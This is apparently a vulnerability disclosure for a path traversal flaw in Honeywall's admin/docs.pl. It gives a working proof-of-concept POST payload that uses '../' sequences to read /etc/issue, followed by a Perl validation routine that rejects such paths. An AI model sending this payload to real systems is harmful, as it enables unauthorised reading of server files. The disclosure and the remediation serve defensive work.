Publishing author: cnyouker
Vulnerability type: arbitrary file traversal/download
Vulnerability description: Honeywall admin interface arbitrary file read vulnerability
Detailed description: admin/docs.pl does not strictly validate the file parameter submitted via POST. An attacker can construct their own POST request to read arbitrary files.
Proof of vulnerability: http://xxx.xxx.xxx/admin/docs.pl
POST content: act=1 6&file=../../../../../../../../etc/issue&submit=Submit
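
One way to enforce the missing check on the file parameter, shown as an added example in Perl (this is not Honeywall's code; the helper name safe_doc_path and the temporary directory standing in for the docs root are assumptions):

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Resolve a user-supplied name against a fixed base directory and return the
# canonical path only if it is a regular file inside that directory.
# Returns undef for traversal, absolute paths, NUL bytes and symlink escapes.
sub safe_doc_path {
    my ($base, $name) = @_;
    return unless defined $name && length $name;
    return if $name =~ /\0/;                              # NUL truncation tricks
    return if File::Spec->file_name_is_absolute($name);   # e.g. /etc/issue

    my $root = eval { realpath($base) };
    return unless defined $root;

    # realpath collapses ../ sequences and follows symlinks, so the check
    # below runs on the path the kernel would actually open.
    my $full = eval { realpath(File::Spec->catfile($root, $name)) };
    return unless defined $full && -f $full;

    # Containment check with a trailing separator, so that a sibling such as
    # /docs-old does not pass as a child of /docs.
    return unless index($full, "$root/") == 0;
    return $full;
}

# Constructed demonstration: a temporary directory stands in for the docs root.
my $docs = tempdir(CLEANUP => 1);
open(my $fh, '>', "$docs/readme.txt") or die "cannot create sample file: $!";
print {$fh} "sample\n";
close($fh);

# The second entry is the file value from the proof of vulnerability above.
for my $name ('readme.txt', '../../../../../../../../etc/issue', '/etc/issue') {
    my $path = safe_doc_path($docs, $name);
    printf "%-40s => %s\n", $name, defined $path ? "serve $path" : 'rejected';
}
```

Only readme.txt is served; the traversal string and the absolute path are both rejected before any file is opened.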